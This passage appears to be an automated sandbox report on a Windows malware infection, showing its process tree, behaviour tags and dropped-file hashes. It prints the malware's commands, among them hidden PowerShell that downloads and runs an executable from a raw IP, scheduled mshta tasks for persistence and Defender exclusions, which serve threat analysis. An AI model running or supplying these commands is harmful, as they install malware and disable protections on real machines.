                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4424,i,13301411901747072211,5529703699865325905,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4432 /prefetch:2
                                                8⤵
                                                • Uses browser remote debugging
                                                PID:7524
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4604,i,13301411901747072211,5529703699865325905,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4588 /prefetch:1
                                                8⤵
                                                • Uses browser remote debugging
                                                PID:7704
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                              7⤵
                                              • Uses browser remote debugging
                                              • Enumerates system info in registry
                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                              • Suspicious use of FindShellTrayWindow
                                              PID:2424
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x250,0x7ffebda2f208,0x7ffebda2f214,0x7ffebda2f220
                                                8⤵
                                                • Checks processor information in registry
                                                • Enumerates system info in registry
                                                PID:3640
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1968,i,8763688267486841258,1752877216515776440,262144 --variations-seed-version --mojo-platform-channel-handle=1964 /prefetch:2
                                                8⤵
                                                  PID:3972
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2132,i,8763688267486841258,1752877216515776440,262144 --variations-seed-version --mojo-platform-channel-handle=2252 /prefetch:3
                                                  8⤵
                                                    PID:1476
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2596,i,8763688267486841258,1752877216515776440,262144 --variations-seed-version --mojo-platform-channel-handle=2588 /prefetch:8
                                                    8⤵
                                                      PID:3208
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3540,i,8763688267486841258,1752877216515776440,262144 --variations-seed-version --mojo-platform-channel-handle=3608 /prefetch:1
                                                      8⤵
                                                      • Uses browser remote debugging
                                                      PID:6732
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3548,i,8763688267486841258,1752877216515776440,262144 --variations-seed-version --mojo-platform-channel-handle=3624 /prefetch:1
                                                      8⤵
                                                      • Uses browser remote debugging
                                                      PID:2340
                                                  • C:\ProgramData\t0z5xlxl6x.exe
                                                    "C:\ProgramData\t0z5xlxl6x.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:7068
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                      8⤵
                                                        PID:7272
                                                    • C:\ProgramData\vkng4e3ozm.exe
                                                      "C:\ProgramData\vkng4e3ozm.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:7732
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                        8⤵
                                                          PID:7816
                                                      • C:\ProgramData\hl6pzu3w4o.exe
                                                        "C:\ProgramData\hl6pzu3w4o.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        PID:8344
                                                        • C:\Users\Admin\AppData\Local\Temp\tu2ciSaq\nPibs6xgC0hmmcfZ.exe
                                                          C:\Users\Admin\AppData\Local\Temp\tu2ciSaq\nPibs6xgC0hmmcfZ.exe 0
                                                          8⤵
                                                          • Drops startup file
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          • System Location Discovery: System Language Discovery
                                                          PID:8404
                                                          • C:\Users\Admin\AppData\Local\Temp\tu2ciSaq\atfv5FaMFjXn4psV.exe
                                                            C:\Users\Admin\AppData\Local\Temp\tu2ciSaq\atfv5FaMFjXn4psV.exe 8404
                                                            9⤵
                                                            • Drops startup file
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:8500
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\ozm7y" & exit
                                                        7⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:8668
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout /t 11
                                                          8⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Delays execution with timeout.exe
                                                          PID:8776
                                                  • C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:1416
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                      6⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3592
                                                  • C:\Users\Admin\AppData\Local\Temp\10028410101\ffffff.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10028410101\ffffff.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:1696
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                      6⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3436
                                                  • C:\Users\Admin\AppData\Local\Temp\10033050101\f5f92e5ede.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10033050101\f5f92e5ede.exe"
                                                    5⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    PID:6704
                                              • C:\Users\Admin\AppData\Local\Temp\10268790101\ltYwNVG.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10268790101\ltYwNVG.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:4928
                                                • C:\Users\Admin\AppData\Local\Temp\onefile_4928_133869140337715214\services.exe
                                                  C:\Users\Admin\AppData\Local\Temp\10268790101\ltYwNVG.exe
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3964
                                              • C:\Users\Admin\AppData\Local\Temp\10270460101\f3085375f3.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10270460101\f3085375f3.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                PID:1060
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c schtasks /create /tn wkj9nma1s4F /tr "mshta C:\Users\Admin\AppData\Local\Temp\lbZdMr7WH.hta" /sc minute /mo 25 /ru "Admin" /f
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5788
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /create /tn wkj9nma1s4F /tr "mshta C:\Users\Admin\AppData\Local\Temp\lbZdMr7WH.hta" /sc minute /mo 25 /ru "Admin" /f
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1688
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  mshta C:\Users\Admin\AppData\Local\Temp\lbZdMr7WH.hta
                                                  4⤵
                                                  • Checks computer location settings
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3020
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ICN6MP80FCURCFO4EK12DTLB1NHBZKTY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                    5⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Downloads MZ/PE file
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3652
                                                    • C:\Users\Admin\AppData\Local\TempICN6MP80FCURCFO4EK12DTLB1NHBZKTY.EXE
                                                      "C:\Users\Admin\AppData\Local\TempICN6MP80FCURCFO4EK12DTLB1NHBZKTY.EXE"
                                                      6⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1932
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10270470121\am_no.cmd" "
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:5912
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 2
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Delays execution with timeout.exe
                                                  PID:2668
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5672
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5996
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4356
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4588
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3656
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5692
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /create /tn "3LcgdmaQNqk" /tr "mshta \"C:\Temp\FvtzQXKVj.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:5196
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  mshta "C:\Temp\FvtzQXKVj.hta"
                                                  4⤵
                                                  • Checks computer location settings
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4900
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                    5⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Downloads MZ/PE file
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5856
                                                    • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                      6⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2896
                                              • C:\Users\Admin\AppData\Local\Temp\10270900101\16a8c4c8bc.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10270900101\16a8c4c8bc.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:2964
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3080
                                              • C:\Users\Admin\AppData\Local\Temp\10270920101\ltYwNVG.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10270920101\ltYwNVG.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:2380
                                                • C:\Users\Admin\AppData\Local\Temp\onefile_2380_133869140518841390\services.exe
                                                  C:\Users\Admin\AppData\Local\Temp\10270920101\ltYwNVG.exe
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1928
                                              • C:\Users\Admin\AppData\Local\Temp\10270930101\aZYFObO.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10270930101\aZYFObO.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:2396
                                              • C:\Users\Admin\AppData\Local\Temp\10270940101\d3jhg_003.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10270940101\d3jhg_003.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: MapViewOfSection
                                                PID:1632
                                                • C:\Windows\SYSTEM32\cmd.exe
                                                  cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                  4⤵
                                                    PID:5080
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                      5⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2244
                                                  • C:\Windows\system32\svchost.exe
                                                    "C:\Windows\system32\svchost.exe"
                                                    4⤵
                                                    • Downloads MZ/PE file
                                                    • Adds Run key to start application
                                                    PID:2728
                                                    • C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exe
                                                      "C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exe" ""
                                                      5⤵
                                                      • Sets service image path in registry
                                                      • Executes dropped EXE
                                                      • Suspicious behavior: LoadsDriver
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4364
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Add-MpPreference -ExclusionPath C:\
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4728
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Remove-MpPreference -ExclusionPath C:\
                                                        6⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:12324
                                                    • C:\Users\Admin\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exe" "{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      PID:3636
                                                • C:\Users\Admin\AppData\Local\Temp\10270950101\dW2A04h.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10270950101\dW2A04h.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:4036
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                    4⤵
                                                      PID:2864
                                                  • C:\Users\Admin\AppData\Local\Temp\10270960101\Sbyncpk.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10270960101\Sbyncpk.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    PID:7584
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                      4⤵
                                                        PID:8300
                                                    • C:\Users\Admin\AppData\Local\Temp\10270980101\DtSVjfo.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10270980101\DtSVjfo.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      PID:7656
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                        4⤵
                                                          PID:7876
                                                      • C:\Users\Admin\AppData\Local\Temp\10270990101\HmngBpR.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10270990101\HmngBpR.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:11104
                                                        • C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
                                                          C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
                                                          4⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:13160
                                                          • C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
                                                            C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: MapViewOfSection
                                                            PID:13288
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\SysWOW64\cmd.exe
                                                              6⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:6156
                                                      • C:\Users\Admin\AppData\Local\Temp\10271000101\BbU7NdP.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10271000101\BbU7NdP.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:6412
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:6492
                                                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                    1⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2308
                                                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                    1⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:5844
                                                  • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                    C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    PID:5712
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1076 -ip 1076
                                                    1⤵
                                                      PID:4628
                                                    • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                      "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                      1⤵
                                                        PID:6740
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                        1⤵
                                                          PID:1076
                                                        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                          C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                          1⤵
                                                          • Executes dropped EXE
                                                          PID:6680
                                                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                          1⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:6372

                                                        Network

                                                        MITRE ATT&CK Enterprise v15

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\ProgramData\hl6pzu3w4o.exe

                                                          Filesize

                                                          251KB

                                                          MD5

                                                          58d3a0d574e37dc90b40603f0658abd2

                                                          SHA1

                                                          bf5419ce7000113002b8112ace2a9ac35d0dc557

                                                          SHA256

                                                          dcc05c3ac7ae22d601bcb7c97cfcda568f3041bd39b2fd8899282dfde83369a5

                                                          SHA512

                                                          df61329a32e9261b01c5b7d95e0d9a3fb8cc36e5d90ede72bc16befe00fb32c221898a8346db9de07c0f5dcba57dcdbb09a22ca8b73223f989d33ec433c3a90a

                                                        • C:\ProgramData\vkng4e3ozm.exe

                                                          Filesize

                                                          462KB

                                                          MD5

                                                          3cd30aea7633791248d6b828a69d7255

                                                          SHA1

                                                          ee60108c29518d760804106af009251d66300602

                                                          SHA256

                                                          d2bcc0239e7a272fa47b91a726598fd7ad526d7ca16a3ca3556bfc3db7e3bb81

                                                          SHA512

                                                          7b7c5fa887e500200208e5727338050e4a0e49cf1ece5b8b23bd29699b2c03f4749fb54a82d8e473a0f2edcf136287f4ef758552e1a3656373c1615c0bac566f

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                          Filesize

                                                          80KB

                                                          MD5

                                                          08291597937539ff0e0d34ba006ecb41

                                                          SHA1

                                                          6704acc9132cc47cd22c7cc2799a2599f1667bc5

                                                          SHA256

                                                          c529678fd202bd4d8526297f9c7cbccf47870e63b8050c0c783ed92894568391

                                                          SHA512

                                                          a009c7ba5a06c165ff792cd3334a3c24cb8e3e1487d3c679d929338a5d036e77776d69c3d7b6f791f8ffc0973315877252e5dd7aaaf4b84cca10065c7d6626c3

                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                          Filesize

                                                          2KB

                                                          MD5

                                                          d85ba6ff808d9e5444a4b369f5bc2730

                                                          SHA1

                                                          31aa9d96590fff6981b315e0b391b575e4c0804a

                                                          SHA256

                                                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                          SHA512

                                                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                          Filesize

                                                          2KB

                                                          MD5

                                                          968cb9309758126772781b83adb8a28f

                                                          SHA1

                                                          8da30e71accf186b2ba11da1797cf67f8f78b47c

                                                          SHA256

                                                          92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                                                          SHA512

                                                          4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                          Filesize

                                                          280B

                                                          MD5

                                                          60d40d2b37759323c10800b75df359b8

                                                          SHA1

                                                          f5890e7d8fc1976fe036fea293832d2e9968c05c

                                                          SHA256

                                                          c3a2f26d5aef8b5ed1d23b59ed6fce952b48194bed69e108a48f78aec72126e0

                                                          SHA512

                                                          0c339563594cc9f930a64903281589886308d4412ee267e976520a58d86b2c339d7b2320e1b3fd6fbf81f092ff1735f0710c669af2986ea5b63d2c1e0a6df902

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\548e3de4-5f7a-478f-be3d-50e211f1a149\index-dir\the-real-index

                                                          Filesize

                                                          1KB

                                                          MD5

                                                          327b4c08489ef08e12d57d4ee537db59

                                                          SHA1

                                                          a2fecf3ac47749172e6944869707afa67e972151

                                                          SHA256

                                                          d831b9ab9246268e9a56309994597ff59099694e3d130e54ec7dbabc28b73ec7

                                                          SHA512

                                                          c3af9b5f4cf61b80fd15ad60624286b3388c00d9aa42201f05c609007740196b4a730d3b9ad874be30bb4200bd2a1c06d50d1ae77d65575b7a141467acc29296

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\548e3de4-5f7a-478f-be3d-50e211f1a149\index-dir\the-real-index~RFe5933c8.TMP

                                                          Filesize

                                                          1KB

                                                          MD5

                                                          2a2b2195f2fec728885e28d3ba364681

                                                          SHA1

                                                          e87c0b2a716306856a01517664ef44d5f8d72dcf

                                                          SHA256

                                                          03616650aaf43f5f6a1c15598556bdbe2782a2a1da5aeddbd58d36b96d0189aa

                                                          SHA512

